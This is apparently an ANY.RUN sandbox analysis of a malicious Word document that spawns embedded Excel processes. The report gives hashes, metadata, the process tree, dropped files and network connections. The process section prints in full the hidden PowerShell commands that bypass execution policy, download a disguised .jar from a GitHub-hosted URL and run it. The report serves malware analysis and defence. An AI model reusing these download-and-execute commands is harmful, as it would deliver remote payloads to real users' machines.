analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

08_07_2013_23-33_gelenmail.docx

Full analysis: https://app.any.run/tasks/90732458-3964-43cf-8f57-6d349884cfa1
Verdict: Malicious activity
Analysis date: July 11, 2019, 16:40:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

6E64370C801AAF939EA59C64D2CEAA21

SHA1:

2FBC4625684D475F126917379CA0E180387237E8

SHA256:

5D7BA29167BBF3E2B653A036FEA3A23F45518B1D2642175419749E60C8252602

SSDEEP:

3072:XsSqWdTy0DwvhiXtX/fvu73YW0jL1em31rUACMV:XYWFTDvBXvuz+8mrd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2920)
      • EXCEL.EXE (PID: 2860)
      • EXCEL.EXE (PID: 2412)

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2860)
      • EXCEL.EXE (PID: 2412)

    • Executes PowerShell scripts

      • CMD.EXE (PID: 3604)
      • CMD.EXE (PID: 3688)

  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 4008)
      • EXCEL.EXE (PID: 2860)
      • EXCEL.EXE (PID: 2412)

    • Creates files in the user directory

      • powershell.exe (PID: 2220)
      • powershell.exe (PID: 3764)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2920)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 4008)
      • WINWORD.EXE (PID: 2920)
      • EXCEL.EXE (PID: 2860)
      • EXCEL.EXE (PID: 2412)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2220)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

XMP

Description: -
Creator: TESTER
Subject: -
Title: -

XML

ModifyDate: 2019:07:06 10:40:00Z
CreateDate: 2019:07:06 10:32:00Z
RevisionNumber: 8
LastModifiedBy: TESTER
Keywords: -
AppVersion: 12
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 20
LinksUpToDate: No
Company: TESTER
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 18
Words: 3
Pages: 1
TotalEditTime: 5 minutes
Template: Normal.dotm

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1510
ZipCompressedSize: 398
ZipCRC: 0x1a34d400
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
9
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs verclsid.exe no specs excel.exe no specs excel.exe no specs cmd.exe no specs powershell.exe excel.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2920"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\08_07_2013_23-33_gelenmail.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2896"C:\Windows\system32\verclsid.exe" /S /C {00020820-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5C:\Windows\system32\verclsid.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Extension CLSID Verification Host
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4008"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2860"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3604CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/64865/8oh6hj/gh-pages/w95r265vb8o9np.otf\" ,\" %tmp%\\irs5WQ.jar\") }" & %tmp%\\irs5WQ.jarC:\Windows\system32\CMD.EXEEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2220powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/64865/8oh6hj/gh-pages/w95r265vb8o9np.otf\" ,\" C:\Users\admin\AppData\Local\Temp\\irs5WQ.jar\") }" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2412"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3688CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/64865/8oh6hj/gh-pages/w95r265vb8o9np.otf\" ,\" %tmp%\\irs5WQ.jar\") }" & %tmp%\\irs5WQ.jarC:\Windows\system32\CMD.EXEEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3764powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/64865/8oh6hj/gh-pages/w95r265vb8o9np.otf\" ,\" C:\Users\admin\AppData\Local\Temp\\irs5WQ.jar\") }" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 986
Read events
2 398
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR49F3.tmp.cvr
MD5:
SHA256:
2920WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76C2E1CE.png
MD5:
SHA256:
4008EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8101.tmp.cvr
MD5:
SHA256:
2860EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8631.tmp.cvr
MD5:
SHA256:
2220powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y621H1II3KKZIPY54JZ9.temp
MD5:
SHA256:
2412EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRBD4A.tmp.cvr
MD5:
SHA256:
3764powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GBHF64P4UXY91N7N1OMU.temp
MD5:
SHA256:
2920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_07_2013_23-33_gelenmail.docxpgc
MD5:E406CD2F9BD550B8789220C12DC5ED59
SHA256:83F1F920A2B6F951F1126FA2FEFA84906DD312CA7CC80C3CB7BE016306C334C4
3764powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:47388A8B771AD359484FBDBC4C2AF508
SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0
2920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Excel.xlstext
MD5:ABAF1219998D21FD18C8D86E1B45BC20
SHA256:E2B8C8A06840E01DACDB9C37F45BE20D7C3BDC842F0A5147D3922F1C019E159C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2220
powershell.exe
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious
3764
powershell.exe
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious

DNS requests

Domain
IP
Reputation
raw.githubusercontent.com
  • 151.101.0.133
  • 151.101.64.133
  • 151.101.128.133
  • 151.101.192.133
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
08_07_2013_23-33_gelenmail.docx